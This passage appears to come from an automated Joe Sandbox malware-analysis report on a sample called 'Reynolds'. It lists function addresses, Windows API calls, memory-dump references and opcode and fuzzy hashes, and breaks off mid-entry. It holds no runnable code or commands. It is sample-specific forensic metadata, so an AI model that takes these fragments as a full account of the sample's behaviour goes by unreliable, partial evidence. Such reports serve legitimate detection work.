                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                      • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                      • API String ID: 779396738-2360590182
                                                                                                      • Opcode ID: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                                                                                                      • Instruction ID: f372918b012036ddb691910acf3967ad525e122e314346371644d9aeba06efd3
                                                                                                      • Opcode Fuzzy Hash: 16a998d4ffd8908b2b5846d7a7af52c857f6656f6899eb4e8e8eaa093dec734f
                                                                                                      • Instruction Fuzzy Hash: CD319C22A09B82D9F710AF21E8801ADB7B4FB49B84F998175DA8C43B65DF3CD156C720
                                                                                                      Function 00007FF7AA19B97C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                      • String ID: msctls_trackbar32
                                                                                                      • API String ID: 1025951953-1010561917
                                                                                                      • Opcode ID: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                                                                                                      • Instruction ID: 50f93d33aca7e7cc483ab38b40f35c8e0add362365107d9d8660ed0ba7570a8b
                                                                                                      • Opcode Fuzzy Hash: 0ec90dd8264e47930b8add246dd2117d3f761b03aba2c3bb1ed4f7e4c6c127fa
                                                                                                      • Instruction Fuzzy Hash: 3E312972A09681DBE3609F15F444B5AB7A1F788B90F554279EB9803B64CF38D842CB14
                                                                                                      Function 00007FF7AA118612 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2280078643-1018135373
                                                                                                      • Opcode ID: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                                                                                                      • Instruction ID: 03295f04609645be29299de6a39b3b551d44c707bb698c12494ab5301c4d2bf5
                                                                                                      • Opcode Fuzzy Hash: f6c1382f695be2b80eeb360de390ec25b85b68791ec0bc773e7ce0cc61abff03
                                                                                                      • Instruction Fuzzy Hash: 3C213A36A09641D6E631AB11F04066EF770F784B64F824669DF9D077A9CF3DE886CB10
                                                                                                      Function 000002453CA2E1F8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: msvcrt.dll$vsprintf_s
                                                                                                      • API String ID: 1646373207-1988861753
                                                                                                      • Opcode ID: c170bdf9de4795b3e807faf33673cebfa0616c7fbbb8f4b28fd9d82f7f5b2bed
                                                                                                      • Instruction ID: bd1298542a8c0a53371a974a359bf4132fe089d0f473d4fbafde015d83372415
                                                                                                      • Opcode Fuzzy Hash: c170bdf9de4795b3e807faf33673cebfa0616c7fbbb8f4b28fd9d82f7f5b2bed
                                                                                                      • Instruction Fuzzy Hash: 84F03C22301E2493ED068F92FCAC6902A61B769BD1F444462AD8E53B62EA38C5C6C300
                                                                                                      Function 000002453CA2E280 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: msvcrt.dll$vsprintf_s
                                                                                                      • API String ID: 1646373207-1988861753
                                                                                                      • Opcode ID: be6fae490bca3bf3f48884fcaf50d5a2afb0013b4304e3fa71c39259847c8bdf
                                                                                                      • Instruction ID: 89bf3775357e8462e38537bd42b0cba5837f899f110ff8b4b4657f72b170a9f7
                                                                                                      • Opcode Fuzzy Hash: be6fae490bca3bf3f48884fcaf50d5a2afb0013b4304e3fa71c39259847c8bdf
                                                                                                      • Instruction Fuzzy Hash: EDF0F922301F2493ED06CF92FCAC6902A60B769BD1F4444729D8E53B62EA7CC5C6C300
                                                                                                      Function 000002453CA23240 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: msvcrt.dll$strerror_s
                                                                                                      • API String ID: 1646373207-1151979360
                                                                                                      • Opcode ID: a872cb84f38791f9cbc95820ea33779f62d02292e93b4a49b54b6c31097f03e9
                                                                                                      • Instruction ID: e841f25b9690492ddf6747131b2cd411ccd53270ba47eb4cbcf30252f662eb48
                                                                                                      • Opcode Fuzzy Hash: a872cb84f38791f9cbc95820ea33779f62d02292e93b4a49b54b6c31097f03e9
                                                                                                      • Instruction Fuzzy Hash: 20F03A66305E3593EE168F86FD6C6A02BA5B759BD4F4441A19C8E43B66EA3CC4C98340
                                                                                                      Function 000002453CA231C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: msvcrt.dll$strerror_s
                                                                                                      • API String ID: 1646373207-1151979360
                                                                                                      • Opcode ID: 78e8e9579174cfe3d9221c1e12294a1ca8a3da3f77a020aac9a97917498637f9
                                                                                                      • Instruction ID: 9ac570d497ecc518d760d6c4641120f2e9d2508d1e04509292d7df6cf398a86d
                                                                                                      • Opcode Fuzzy Hash: 78e8e9579174cfe3d9221c1e12294a1ca8a3da3f77a020aac9a97917498637f9
                                                                                                      • Instruction Fuzzy Hash: 56F09A62301E3093EE068F86FD6C6A02BA0B758BD0F4040A19C8E43B62EA3CC4C98340
                                                                                                      Function 00007FF7AA0F71C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                      • Opcode ID: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                                                                                                      • Instruction ID: fc214864893f8c8afa10732fc7bbfcc01e317ea7242854d4bb2a3f3b97305d3f
                                                                                                      • Opcode Fuzzy Hash: 935ee8e5b0afee5f2a3e8b61c9fff60d84134b50b40d875a31bd5a84aed26f6b
                                                                                                      • Instruction Fuzzy Hash: 3CE0392190AB06D1FF15AB10E454378A2A0BB08B98F850474C91C02360EFBC92AAC350
                                                                                                      Function 00007FF7AA0F720C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                      • Opcode ID: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                                                                                                      • Instruction ID: 07fbbe625ff8ec4f83fb20d38c809c81f5ad4415385657acd8c2fe8a5eddefef
                                                                                                      • Opcode Fuzzy Hash: 849496fe8f7c3fa53244a860dec0166c597485a1e7ca8ffba036c0d989768c29
                                                                                                      • Instruction Fuzzy Hash: E1E0392190AB06D1FB55AB21E444328A2A0AB08B58F850474C91C02364EFBC96A6C310
                                                                                                      Function 00007FF7AA1638DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                      • API String ID: 2574300362-192647395
                                                                                                      • Opcode ID: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                      • Instruction ID: 62c04a96615c10bebfac3be025221f3aa7ac4055c1f0c4dc852a5ab09db7ab51
                                                                                                      • Opcode Fuzzy Hash: b441bd5978eb2b7f425b1bf27e1c65cb3c7479a7c4568158e328b2615627030f
                                                                                                      • Instruction Fuzzy Hash: 87E0392190AB06E1FB16AB10F444328A3B0AB08B58FC604B8C91D423A4EFBC92968310
                                                                                                      Function 00007FF7AA15BDC8 Relevance: 6.3, APIs: 4, Instructions: 299COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                      • Instruction ID: 974a5f0d436d9c41ec018ad0573c9645d19fa9be29a3cd9965865687261d3b9a
                                                                                                      • Opcode Fuzzy Hash: 8ea6f4ac70786459caae908e23c7b1e170f2c83987f10f6455c2ac2cf614949c
                                                                                                      • Instruction Fuzzy Hash: FBD14776B05B56D6EB159F6AD8802AC77B0FB88F88B524462DF0D87B64DF39D842C310
                                                                                                      Function 00007FF7AA188334 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                                                                                                      • Instruction ID: 3cfe3270aa8696e9fd3d5715c827aea55657dc3bfd4e9a9dc6b3e537713b52c6
                                                                                                      • Opcode Fuzzy Hash: fc57336e55be4d4a0414789caafff31700b7c62f52e3843f0ecb10163a0943b0
                                                                                                      • Instruction Fuzzy Hash: 15D14B66B06A46EAFB01EF64E4801EC73B1FB58788B8100B5DE0D57B69DF38D52AC350
                                                                                                      Function 00007FF7AA0F9D70 Relevance: 6.2, APIs: 4, Instructions: 247fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ReadFile.KERNEL32(?,?,00007FF7AA0F475D,?,?,?,00007FF7AA0F8FCF,?,?,?,?,?,?,?,00007FF7AA0F9D60), ref: 00007FF7AA0F9F34
                                                                                                      • SetFilePointerEx.KERNEL32(?,?,00007FF7AA0F475D,?,?,?,00007FF7AA0F8FCF,?,?,?,?,?,?,?,00007FF7AA0F9D60), ref: 00007FF7AA13D886
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$PointerRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 3154509469-0
                                                                                                      • Opcode ID: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                      • Instruction ID: fc93f98e34c3c2b1a070838b82cbdf88149eb4b27e656a20036fb70acc665be4
                                                                                                      • Opcode Fuzzy Hash: 3201254c23c442e17564adbb3e46d8ade15d1a5368ec0c22c80302ae78d27f32
                                                                                                      • Instruction Fuzzy Hash: 1BB1D472A0AA03D6F766EF11E054239E361FB44B90F9245B5CA9F137A4EF3DE0428320
                                                                                                      Function 000002453CA28D60 Relevance: 6.2, APIs: 4, Instructions: 242COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2221118986-0
                                                                                                      • Opcode ID: efedc6db8a8de6570b7317df3c38829cd4fe2332aa1d083318f2408eb1a2f197
                                                                                                      • Instruction ID: 77603c76030ab9090f8f682a960c5b5158db0971325441cfb0588a52918677c1
                                                                                                      • Opcode Fuzzy Hash: efedc6db8a8de6570b7317df3c38829cd4fe2332aa1d083318f2408eb1a2f197
                                                                                                      • Instruction Fuzzy Hash: 3F91B373710A718BF73A8E2AD55875ABBA1E714BD0F048155EBD787B92D339E4C18B00
                                                                                                      Function 000002453CA26660 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2221118986-0
                                                                                                      • Opcode ID: 6f706c2f9662a9f5d77030e6d5979e72f3f9192043edb250d81c99e22c2424e3
                                                                                                      • Instruction ID: e0be223d3d4cd0e78fc99684930cf9fc410320b672575407985ceb54733f4db8
                                                                                                      • Opcode Fuzzy Hash: 6f706c2f9662a9f5d77030e6d5979e72f3f9192043edb250d81c99e22c2424e3
                                                                                                      • Instruction Fuzzy Hash: 56919F73A02AB18BF73A8E6AE55C76A7BE1E7147D4F048155CBD747BC2D628E8C18700
                                                                                                      Function 000002453CA252C0 Relevance: 6.2, APIs: 4, Instructions: 196stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$localeconvstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1629795015-0
                                                                                                      • Opcode ID: 2441d44a64f54eac264ff3ea01819bb6f544c7ddd3aefe14e0d908759fd2c1c3
                                                                                                      • Instruction ID: 8bbcfdbba48425d742b2652b7dbdbb45dcd140c6a6d5a39298b761fbb1140af3
                                                                                                      • Opcode Fuzzy Hash: 2441d44a64f54eac264ff3ea01819bb6f544c7ddd3aefe14e0d908759fd2c1c3
                                                                                                      • Instruction Fuzzy Hash: FB612417209BF147E7139F1652893ADAF83B7627C1F4881A2CBC707B83D66AC0DA9310
                                                                                                      Function 000002453CA2AE70 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 133COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2312180188.000002453CA20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002453CA20000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_2453ca20000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalLeaveSectionfreememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1662925646-3916222277
                                                                                                      • Opcode ID: ce4a49f96bda839becf80caacf2f5005059100abfa65e5ed32089ffff8e3bfae
                                                                                                      • Instruction ID: 69bb583ab3a0eb36ca8ed25d3cf34691c8a89160be19ccd825b937e5a2913bd9
                                                                                                      • Opcode Fuzzy Hash: ce4a49f96bda839becf80caacf2f5005059100abfa65e5ed32089ffff8e3bfae
                                                                                                      • Instruction Fuzzy Hash: 3A41E3A3600E6487EA278F65E5582AC7B61F7447E4F4083A1DAAB437D2DB38D9D6C700
                                                                                                      Function 00007FF7AA19F778 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1352109105-0
                                                                                                      • Opcode ID: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                      • Instruction ID: 2b346a77218a51e89d03519cd55948efc3dc10dc1a20a601f00523ecb8fa2818
                                                                                                      • Opcode Fuzzy Hash: bf09fe5937f6b34ddc429ee35f9a2399ceb717e99e565ce14bad0b4b6f8036fa
                                                                                                      • Instruction Fuzzy Hash: CA418232A0AB56E1FB92AF15E844938B3B1FB44B54F960176DA1D832B0DF38E442C351
                                                                                                      Function 00007FF7AA19B278 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000011.00000002.2313091589.00007FF7AA0F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7AA0F0000, based on PE: true
                                                                                                      • Associated: 00000011.00000002.2313046723.00007FF7AA0F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313480570.00007FF7AA1C8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DA000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313622285.00007FF7AA1DE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                      • Associated: 00000011.00000002.2313668684.00007FF7AA1E4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_17_2_7ff7aa0f0000_Reynolds.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Item$DrawInfoInsert
                                                                                                      • String ID:
                                                                                                      • API String ID: 3076010158-0
                                                                                                      • Opcode ID: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                                                                                                      • Instruction ID: 24cc6007fe38bff7c21e960ac0f8b1ccfc5abae1514f654728001ad0bac36421
                                                                                                      • Opcode Fuzzy Hash: 6ffcaf284c61e2dc411bcc38c084d1ebc1702a088337431afa78768ad14ccc95
                                                                                                      • Instruction Fuzzy Hash: CC41BB32A09A81EAFB20DF22E4805AD77B5FB44B84F96407ADE0D13764CF38E956C710
                                                                                                      Function 00007FF7AA12C5BC Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
